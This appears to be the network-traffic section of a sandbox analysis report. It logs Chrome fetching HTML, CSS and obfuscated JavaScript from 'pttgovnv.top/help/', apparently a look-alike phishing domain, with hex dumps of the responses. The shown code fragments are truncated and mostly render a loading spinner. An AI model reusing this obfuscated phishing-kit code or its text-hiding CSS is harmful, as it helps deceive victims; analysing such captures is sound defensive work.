          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g4XpsdzAFy98sWzjuHoXB8KMrfV852W4gIJmx0fnpi0BIgTBAr0HMAcaxdC%2F2q%2BRyUGvJ9DGsYSphzkLpNBwkHszH2pkk7r447bJa6Nbp107P6LdvKv0jFbJyr4nckY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acc979b25e68-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:13 UTC662INData Raw: 36 36 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 0a 20 20 20 20 20 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 0a 20 20 20 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 73 72 63 3d 22 2e 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 66 35 34 35 37 37 31 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70
          Data Ascii: 665<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" /> <script type="module" crossorigin src="./assets/index-f5457718.js"></scrip
          2024-09-01 22:25:13 UTC982INData Raw: 65 20 69 67 6e 6f 72 65 64 22 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 76 69 74 65 2d 6c 65 67 61 63 79 2d 70 6f 6c 79 66 69 6c 6c 22 29 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6e 2e 73 72 63 3d 65 2e 73 72 63 2c 6e 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 53 79 73 74 65 6d 2e 69 6d 70 6f 72 74 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 76 69 74 65 2d 6c 65 67 61 63 79 2d 65 6e 74 72 79 27 29 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 73 72 63 27 29 29 7d 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 7d 28 29 3b 3c 2f 73 63
          Data Ascii: e ignored");var e=document.getElementById("vite-legacy-polyfill"),n=document.createElement("script");n.src=e.src,n.onload=function(){System.import(document.getElementById('vite-legacy-entry').getAttribute('data-src'))},document.body.appendChild(n)}();</sc
          2024-09-01 22:25:13 UTC6INData Raw: 31 0d 0a 0a 0d 0a
          Data Ascii: 1
          2024-09-01 22:25:13 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.449738172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:13 UTC570OUTGET /help/assets/index-f5457718.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: script
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:13 UTC759INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:13 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:46 GMT
          ETag: W/"7b2c9-18fc3d855f0"
          CF-Cache-Status: HIT
          Age: 43180
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X1zQrv16sODr6sg7Fzk23wsF7H9yGDF74vdPW3z%2BvxvVBGPWG6uSDMzliJvvj3ks2h5a8QwZCVLgG7IzlAXFNpqc%2BKcOKVpheN8j%2BTI0Ro9Ppp0zDTdnwKkpgf8L4Is%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8accbc9150c92-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:13 UTC610INData Raw: 37 63 62 38 0d 0a 76 61 72 20 61 33 38 5f 30 78 33 62 39 38 37 37 3d 61 33 38 5f 30 78 34 33 35 62 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 35 31 35 31 66 2c 5f 30 78 35 34 39 63 64 62 29 7b 76 61 72 20 5f 30 78 39 65 61 31 62 66 3d 61 33 38 5f 30 78 34 33 35 62 2c 5f 30 78 32 31 38 63 33 62 3d 5f 30 78 34 35 31 35 31 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 35 33 61 65 32 32 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 33 62 32 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 33 62 62 29 29 2f 30 78 32 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 34 63 38 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31
          Data Ascii: 7cb8var a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1
          2024-09-01 22:25:13 UTC1369INData Raw: 5f 30 78 32 31 38 63 33 62 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 33 38 5f 30 78 34 38 32 32 2c 30 78 65 37 30 66 36 29 29 3b 66 75 6e 63 74 69 6f 6e 20 50 78 28 29 7b 76 61 72 20 5f 30 78 31 66 62 35 61 63 3d 61 33 38 5f 30 78 34 33 35 62 3b 69 6d 70 6f 72 74 2e 6d 65 74 61 5b 5f 30 78 31 66 62 35 61 63 28 30 78 35 33 63 29 5d 2c 69 6d 70 6f 72 74 28 27 5f 27 29 5b 5f 30 78 31 66 62 35 61 63 28 30 78 36 33 39 29 5d 28 28 29 3d 3e 30 78 31 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 2a 5f 30 78 33 65 39 34 30 33 28 29 7b 7d 7d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 31 33 34 66 33 30 3d 61 33 38 5f 30 78 34 33 35 62 2c 5f 30 78 34 37 36 37 32 39 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 65 61 39 65
          Data Ascii: _0x218c3b['shift']());}}}(a38_0x4822,0xe70f6));function Px(){var _0x1fb5ac=a38_0x435b;import.meta[_0x1fb5ac(0x53c)],import('_')[_0x1fb5ac(0x639)](()=>0x1);async function*_0x3e9403(){}}(function(){var _0x134f30=a38_0x435b,_0x476729=(function(){var _0x4ea9e
          2024-09-01 22:25:13 UTC1369INData Raw: 30 78 33 37 37 34 62 38 28 30 78 34 37 39 29 5d 29 2c 5f 30 78 34 66 64 66 37 34 5b 5f 30 78 33 37 37 34 62 38 28 30 78 31 61 36 29 2b 5f 30 78 33 37 37 34 62 38 28 30 78 36 64 61 29 5d 26 26 28 5f 30 78 33 36 39 31 65 66 5b 5f 30 78 33 37 37 34 62 38 28 30 78 33 37 32 29 2b 5f 30 78 33 37 37 34 62 38 28 30 78 36 64 61 29 5d 3d 5f 30 78 34 66 64 66 37 34 5b 5f 30 78 33 37 37 34 62 38 28 30 78 31 61 36 29 2b 5f 30 78 33 37 37 34 62 38 28 30 78 36 64 61 29 5d 29 2c 5f 30 78 34 66 64 66 37 34 5b 27 63 72 6f 73 73 6f 72 69 67 69 27 2b 27 6e 27 5d 3d 3d 3d 5f 30 78 33 37 37 34 62 38 28 30 78 35 36 36 29 2b 27 74 69 61 6c 73 27 3f 5f 30 78 33 36 39 31 65 66 5b 5f 30 78 33 37 37 34 62 38 28 30 78 35 64 65 29 2b 27 73 27 5d 3d 5f 30 78 33 37 37 34 62 38 28 30 78
          Data Ascii: 0x3774b8(0x479)]),_0x4fdf74[_0x3774b8(0x1a6)+_0x3774b8(0x6da)]&&(_0x3691ef[_0x3774b8(0x372)+_0x3774b8(0x6da)]=_0x4fdf74[_0x3774b8(0x1a6)+_0x3774b8(0x6da)]),_0x4fdf74['crossorigi'+'n']===_0x3774b8(0x566)+'tials'?_0x3691ef[_0x3774b8(0x5de)+'s']=_0x3774b8(0x
          2024-09-01 22:25:13 UTC1369INData Raw: 34 35 36 5d 3d 21 30 78 30 3b 63 6f 6e 73 74 20 5f 30 78 34 63 36 30 62 36 3d 5f 30 78 32 30 35 34 35 36 5b 27 65 6e 64 73 57 69 74 68 27 5d 28 5f 30 78 35 34 39 31 30 39 28 30 78 32 65 31 29 29 2c 5f 30 78 35 30 32 64 39 38 3d 5f 30 78 34 63 36 30 62 36 3f 27 5b 72 65 6c 3d 5c 78 32 32 73 74 79 6c 27 2b 5f 30 78 35 34 39 31 30 39 28 30 78 33 39 35 29 3a 27 27 3b 69 66 28 21 21 5f 30 78 32 38 37 62 65 66 29 66 6f 72 28 6c 65 74 20 5f 30 78 33 34 33 38 31 34 3d 5f 30 78 35 31 37 36 37 64 5b 5f 30 78 35 34 39 31 30 39 28 30 78 33 63 36 29 5d 2d 30 78 31 3b 5f 30 78 33 34 33 38 31 34 3e 3d 30 78 30 3b 5f 30 78 33 34 33 38 31 34 2d 2d 29 7b 63 6f 6e 73 74 20 5f 30 78 32 63 39 66 64 33 3d 5f 30 78 35 31 37 36 37 64 5b 5f 30 78 33 34 33 38 31 34 5d 3b 69 66 28
          Data Ascii: 456]=!0x0;const _0x4c60b6=_0x205456['endsWith'](_0x549109(0x2e1)),_0x502d98=_0x4c60b6?'[rel=\x22styl'+_0x549109(0x395):'';if(!!_0x287bef)for(let _0x343814=_0x51767d[_0x549109(0x3c6)]-0x1;_0x343814>=0x0;_0x343814--){const _0x2c9fd3=_0x51767d[_0x343814];if(
          2024-09-01 22:25:13 UTC1369INData Raw: 78 32 30 36 62 61 31 28 30 78 33 38 65 29 2b 27 5c 78 32 32 68 74 74 70 3a 2f 2f 77 77 27 2b 27 77 2e 77 33 2e 6f 72 67 2f 32 27 2b 27 30 30 30 2f 73 76 67 5c 78 32 32 5c 78 32 30 78 27 2b 5f 30 78 32 30 36 62 61 31 28 30 78 34 35 39 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 33 38 30 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 31 31 63 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 32 32 39 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 35 62 34 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 35 62 37 29 2b 27 30 30 5c 78 32 32 5c 78 32 30 70 72 65 73 65 72 27 2b 5f 30 78 32 30 36 62 61 31 28 30 78 32 62 66 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 35 37 64 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 31 39 33 29 2b 27 5c 78 32 30 3c 70 61 74 68 5c 78 32 30 66 69 6c 27 2b 5f
          Data Ascii: x206ba1(0x38e)+'\x22http://ww'+'w.w3.org/2'+'000/svg\x22\x20x'+_0x206ba1(0x459)+_0x206ba1(0x380)+_0x206ba1(0x11c)+_0x206ba1(0x229)+_0x206ba1(0x5b4)+_0x206ba1(0x5b7)+'00\x22\x20preser'+_0x206ba1(0x2bf)+_0x206ba1(0x57d)+_0x206ba1(0x193)+'\x20<path\x20fil'+_
          2024-09-01 22:25:13 UTC1369INData Raw: 5c 78 32 32 5c 78 32 30 76 61 6c 75 65 73 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 36 33 29 2b 27 5c 78 32 32 5c 78 32 30 64 75 72 3d 5c 78 32 32 31 73 5c 78 32 32 27 2b 27 5c 78 32 30 62 65 67 69 6e 3d 5c 78 32 32 2d 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 66 66 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 35 37 29 2b 27 72 65 70 65 61 74 43 6f 75 6e 27 2b 27 74 3d 5c 78 32 32 69 6e 64 65 66 69 6e 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 66 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 66 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 38 34 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 38 33 29 2b 27 6d 3d 5c 78 32 32 72 6f 74 61 74 65 28 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 34
          Data Ascii: \x22\x20values'+_0x1457f1(0x5be)+_0x1457f1(0x663)+'\x22\x20dur=\x221s\x22'+'\x20begin=\x22-0'+_0x1457f1(0x3ff)+_0x1457f1(0x457)+'repeatCoun'+'t=\x22indefin'+_0x1457f1(0x1f2)+_0x1457f1(0x3fe)+_0x1457f1(0x384)+_0x1457f1(0x183)+'m=\x22rotate('+_0x1457f1(0x54
          2024-09-01 22:25:13 UTC1369INData Raw: 37 66 31 28 30 78 33 36 38 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 30 38 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 66 61 29 2b 27 69 67 68 74 3d 5c 78 32 32 31 32 5c 78 32 32 5c 78 32 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 35 37 29 29 2b 28 5f 30 78 66 33 32 30 35 30 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 78 30 3a 5f 30 78 66 33 32 30 35 30 5b 5f 30 78 31 34 35 37 66 31 28 30 78 34 61 65 29 2b 27 74 65 27 5d 28 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 63 29 29 29 2b 28 5f 30 78 31 34 35 37 66 31 28 30 78 32 36 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 66 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 37 64 29 2b 27 61 6d 65 3d 5c 78 32 32 6f 70 61 63 69 27 2b 27 74 79 5c 78 32 32 5c 78 32 30 76 61 6c 75 65 73 27 2b 5f 30 78 31 34
          Data Ascii: 7f1(0x368)+_0x1457f1(0x408)+_0x1457f1(0x3fa)+'ight=\x2212\x22\x20'+_0x1457f1(0x157))+(_0xf32050==null?void 0x0:_0xf32050[_0x1457f1(0x4ae)+'te'](_0x1457f1(0x5bc)))+(_0x1457f1(0x262)+_0x1457f1(0x4f2)+_0x1457f1(0x27d)+'ame=\x22opaci'+'ty\x22\x20values'+_0x14
          2024-09-01 22:25:13 UTC1369INData Raw: 78 32 30 6b 65 79 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 36 33 29 2b 27 5c 78 32 32 5c 78 32 30 64 75 72 3d 5c 78 32 32 31 73 5c 78 32 32 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 30 30 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 37 64 29 2b 27 74 43 6f 75 6e 74 3d 5c 78 32 32 69 6e 27 2b 27 64 65 66 69 6e 69 74 65 5c 78 32 32 2f 27 2b 27 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 27 2b 27 72 65 63 74 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 30 36 29 2b 27 6e 73 66 6f 72 6d 3d 5c 78 32 32 72 6f 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 36 61 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 65 63 29 2b 5f 30 78 31 34 35 37 66 31 28
          Data Ascii: x20key'+_0x1457f1(0x663)+'\x22\x20dur=\x221s\x22'+_0x1457f1(0x600)+_0x1457f1(0x67d)+'tCount=\x22in'+'definite\x22/'+'>\x0a\x20\x20\x20\x20\x20\x20</'+'rect>\x0a\x20\x20\x20\x20'+_0x1457f1(0x206)+'nsform=\x22ro'+_0x1457f1(0x46a)+_0x1457f1(0x6ec)+_0x1457f1(
          2024-09-01 22:25:13 UTC1369INData Raw: 30 78 31 34 35 37 66 31 28 30 78 31 37 66 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 64 36 29 2b 27 5c 78 32 32 5c 78 32 30 79 3d 5c 78 32 32 32 34 5c 78 32 32 5c 78 32 30 72 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 34 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 33 64 29 2b 27 36 5c 78 32 32 5c 78 32 30 68 65 69 67 68 74 3d 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 39 32 29 2b 27 5c 78 32 32 27 29 2b 28 5f 30 78 66 33 32 30 35 30 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 78 30 3a 5f 30 78 66 33 32 30 35 30 5b 5f 30 78 31 34 35 37 66 31 28 30 78 34 61 65 29 2b 27 74 65 27 5d 28 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 63 29 29 29 2b 28 5f 30 78 31 34 35 37 66 31 28 30 78 32 36 32 29 2b 27 5c 78 32 30 3c 61 6e 69 6d 61 74 65 5c 78 32 30 27 2b 27
          Data Ascii: 0x1457f1(0x17f)+_0x1457f1(0x6d6)+'\x22\x20y=\x2224\x22\x20r'+_0x1457f1(0x44e)+_0x1457f1(0x63d)+'6\x22\x20height='+_0x1457f1(0x692)+'\x22')+(_0xf32050==null?void 0x0:_0xf32050[_0x1457f1(0x4ae)+'te'](_0x1457f1(0x5bc)))+(_0x1457f1(0x262)+'\x20<animate\x20'+'
          2024-09-01 22:25:13 UTC1369INData Raw: 69 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 65 62 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 65 29 2b 27 54 69 6d 65 73 3d 5c 78 32 32 30 3b 31 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 34 35 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 30 30 29 2b 27 2e 30 38 33 33 33 33 33 33 33 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 34 62 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 62 38 29 2b 27 6e 74 3d 5c 78 32 32 69 6e 64 65 66 69 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 39 34 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 32 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 39 31 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 33 66 29 2b 27 72 6d 3d 5c 78 32 32 72 6f 74 61 74 65 27 2b 27 28 33 33 30 5c 78 32 30 35 30 5c 78 32 30 35 30 27 2b 27 29
          Data Ascii: i'+_0x1457f1(0x5eb)+_0x1457f1(0x5be)+'Times=\x220;1'+_0x1457f1(0x245)+_0x1457f1(0x600)+'.083333333'+_0x1457f1(0x54b)+_0x1457f1(0x3b8)+'nt=\x22indefi'+_0x1457f1(0x494)+_0x1457f1(0x42e)+_0x1457f1(0x291)+_0x1457f1(0x53f)+'rm=\x22rotate'+'(330\x2050\x2050'+')


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.449740172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:13 UTC557OUTGET /help/assets/f6170fbbkFGym.css HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: text/css,*/*;q=0.1
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: style
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:14 UTC741INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:14 GMT
          Content-Type: text/css; charset=utf-8
          Content-Length: 952
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"3b8-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 37056
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nATGlNmxZLVhN3gGtuZqVGFJEdvCH5ncs626LaO1SIbpsJ9m2jCOV388E%2BR8iaZgsh1wUbjyc%2FS3YR4OnM87yx3hcQAF%2F16WGrocdAJlr0lA%2B3eOxWBbm%2Fdxf%2F96ki8%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acced8ecc354-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:14 UTC628INData Raw: 40 6b 65 79 66 72 61 6d 65 73 20 67 2d 6c 6f 61 64 69 6e 67 2d 62 67 41 6e 69 6d 7b 30 25 2c 74 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 36 33 35 29 7d 35 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 29 7d 7d 2e 67 2d 6c 6f 61 64 69 6e 67 2d 6d 61 73 6b 7b 77 69 64 74 68 3a 31 30 30 76 77 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 3a 67 2d 6c 6f 61
          Data Ascii: @keyframes g-loading-bgAnim{0%,to{background-color:rgba(255,255,255,.635)}50%{background-color:rgba(255,255,255,0)}}.g-loading-mask{width:100vw;height:100vh;display:flex;justify-content:center;align-items:center;position:fixed;left:0;top:0;animation:g-loa
          2024-09-01 22:25:14 UTC324INData Raw: 7a 65 3a 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 64 61 74 61 2d 74 5d 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 64 61 74 61 2d 74 29 20 22 20 22 7d 5b 63 6c 61 73 73 5e 3d 5f 5d 5b 63 6c 61 73 73 24 3d 5f 5d 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 63 6c 61 73 73 5e 3d 5f 5d 5b 63 6c 61 73 73 24 3d 5f 5d 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 31 30 30 30 76 77 7d 5b 63 6c 61 73 73 5e 3d 5f 5d 5b 63 6c 61 73 73 24 3d 5f 5d 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d
          Data Ascii: ze:1em!important}[data-t]:after{content:attr(data-t) " "}[class^=_][class$=_]{color:transparent!important}[class^=_][class$=_]{display:inline-block;pointer-events:none;position:absolute;left:1000vw}[class^=_][class$=_]::-moz-selection{color:transparent!im


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.449741184.28.90.27443
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:14 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Encoding: identity
          User-Agent: Microsoft BITS/7.8
          Host: fs.microsoft.com
          2024-09-01 22:25:14 UTC467INHTTP/1.1 200 OK
          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
          Content-Type: application/octet-stream
          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
          Server: ECAcc (lpl/EF70)
          X-CID: 11
          X-Ms-ApiVersion: Distribute 1.2
          X-Ms-Region: prod-neu-z1
          Cache-Control: public, max-age=152426
          Date: Sun, 01 Sep 2024 22:25:14 GMT
          Connection: close
          X-CID: 2


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.449743172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:15 UTC532OUTGET /help/assets/77985128JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: script
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:15 UTC768INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:15 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"1264-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 43181
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5JE%2FQfrMv9dhB%2BJOQaD0GxwiIY92u%2B5A0WufLzZ%2FbonRvgU%2BWBHWhibndcCrp2JJeno4XGkTejQ2qEDxacNi66kl11ZFhi7CeMLR31C%2Fb9pUDF%2Ftzl5Z%2BPqp8KQqIAg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acd62f2c32fa-EWR
          alt-svc: h3=":443"; ma=86400
